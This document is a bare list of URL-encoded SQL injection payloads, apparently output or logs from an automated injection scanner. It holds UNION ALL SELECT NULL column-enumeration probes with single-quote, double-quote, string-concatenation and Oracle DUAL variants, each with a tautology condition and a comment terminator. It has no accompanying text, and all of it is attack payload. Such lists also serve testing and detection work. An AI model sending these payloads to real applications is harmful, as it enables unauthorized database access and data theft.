1%27%29%20WHERE%204479%3D4479%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209306%3D9306%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209184%3D9184%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%202869%3D2869%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%201968%3D1968%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%206136%3D6136%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%208541%3D8541%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%204771%3D4771%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%209412%3D9412%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%208173%3D8173%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%206076%3D6076%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%209292%3D9292%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%208389%3D8389%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%203068%3D3068%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%205376%3D5376%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%209632%3D9632%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%203988%3D3988%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%209934%3D9934%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%206570%3D6570%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%201532%3D1532%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%208412%3D8412%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%209720%3D9720%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%207098%3D7098%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%204538%3D4538%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%201553%3D1553%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%205946%3D5946%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%201985%3D1985%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20%7C%7C%20%28SELECT%207183%20FROM%20DUAL%20WHERE%201269%3D1269%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208935%20FROM%20DUAL%20WHERE%207295%3D7295%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%205939%20FROM%20DUAL%20WHERE%207306%3D7306%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201806%20FROM%20DUAL%20WHERE%202639%3D2639%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%206833%20FROM%20DUAL%20WHERE%206856%3D6856%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208781%20FROM%20DUAL%20WHERE%202386%3D2386%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204589%20FROM%20DUAL%20WHERE%201502%3D1502%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209447%20FROM%20DUAL%20WHERE%206537%3D6537%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202877%20FROM%20DUAL%20WHERE%206241%3D6241%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204268%20FROM%20DUAL%20WHERE%208445%3D8445%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208593%20WHERE%205367%3D5367%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204421%20WHERE%205085%3D5085%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207234%20WHERE%201560%3D1560%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201410%20WHERE%204448%3D4448%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203689%20WHERE%206377%3D6377%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207914%20WHERE%205189%3D5189%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208422%20WHERE%201746%3D1746%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203442%20WHERE%204103%3D4103%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202196%20WHERE%208668%3D8668%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201344%20WHERE%205684%3D5684%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%208251%20FROM%20DUAL%20WHERE%208778%3D8778%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206646%20FROM%20DUAL%20WHERE%208950%3D8950%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206611%20FROM%20DUAL%20WHERE%201100%3D1100%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%202520%20FROM%20DUAL%20WHERE%205383%3D5383%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207757%20FROM%20DUAL%20WHERE%207566%3D7566%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207566%20FROM%20DUAL%20WHERE%206497%3D6497%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204711%20FROM%20DUAL%20WHERE%205271%3D5271%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206528%20FROM%20DUAL%20WHERE%208552%3D8552%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209023%20FROM%20DUAL%20WHERE%202698%3D2698%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201185%20FROM%20DUAL%20WHERE%209550%3D9550%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205629%20WHERE%206677%3D6677%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203523%20WHERE%203488%3D3488%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201101%20WHERE%204981%3D4981%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207229%20WHERE%208308%3D8308%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206975%20WHERE%204516%3D4516%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206692%20WHERE%209545%3D9545%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204700%20WHERE%201062%3D1062%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209965%20WHERE%207669%3D7669%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%201622%20WHERE%209043%3D9043%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203137%20WHERE%206498%3D6498%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%27%20%2B%20%28SELECT%20%27Yeqc%27%20FROM%20DUAL%20WHERE%207737%3D7737%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27AKfX%27%20FROM%20DUAL%20WHERE%202309%3D2309%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27cPPh%27%20FROM%20DUAL%20WHERE%209005%3D9005%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ktCu%27%20FROM%20DUAL%20WHERE%208587%3D8587%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27NRGL%27%20FROM%20DUAL%20WHERE%206890%3D6890%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27pnmq%27%20FROM%20DUAL%20WHERE%204589%3D4589%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MIiI%27%20FROM%20DUAL%20WHERE%201265%3D1265%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27BuMH%27%20FROM%20DUAL%20WHERE%203765%3D3765%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27AmRf%27%20FROM%20DUAL%20WHERE%201130%3D1130%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27nxlR%27%20FROM%20DUAL%20WHERE%201191%3D1191%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Jplu%27%20WHERE%209372%3D9372%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27KnTh%27%20WHERE%205398%3D5398%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27TAWq%27%20WHERE%204627%3D4627%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Pxts%27%20WHERE%203973%3D3973%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27YrLE%27%20WHERE%208255%3D8255%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27EBjp%27%20WHERE%204156%3D4156%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 